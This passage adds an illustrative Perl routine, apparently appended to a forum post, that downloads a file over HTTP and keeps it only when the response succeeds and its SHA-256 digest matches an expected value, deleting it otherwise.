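The status and integrity check a downloader like the one above should make, added here as an example and not code from the original post: the file is kept only if the HTTP response succeeded and its SHA-256 matches a digest the caller already trusts (one published next to the file, for instance); otherwise the partial file is removed. It assumes LWP::UserAgent and Digest::SHA; the URL and the digest placeholder are constructed.

```perl
#!/usr/bin/perl
# Added example, not from the original post: download a file and keep it only
# when the HTTP status is a success and the SHA-256 matches the expected one.
use strict;
use warnings;
use LWP::UserAgent;
use Digest::SHA;

# Hex SHA-256 of a file, read in binary mode
sub sha256_of_file {
    my ($file) = @_;
    return Digest::SHA->new(256)->addfile($file, "b")->hexdigest;
}

# download_verified(url, file, expected_sha256_hex): 1 on success, else 0
sub download_verified {
    my ($url, $file, $expected) = @_;
    my $ua  = LWP::UserAgent->new(timeout => 10);
    # :content_file streams the body straight to disk instead of into memory
    my $res = $ua->get($url, ':content_file' => $file);
    unless ($res->is_success) {
        warn "[-] $url: " . $res->status_line . "\n";
        unlink $file if -f $file;
        return 0;
    }
    my $got = sha256_of_file($file);
    if (lc($got) ne lc($expected)) {
        warn "[-] digest mismatch for $file (got $got)\n";
        unlink $file;           # do not leave an unverified file behind
        return 0;
    }
    return 1;
}

# Constructed values: replace with a real URL and its published SHA-256
if (download_verified("http://127.0.0.1/bones.rar", "bones.rar",
                      "<EXPECTED_SHA256_HEX>")) {
    print "[+] file downloaded and verified\n";
}
```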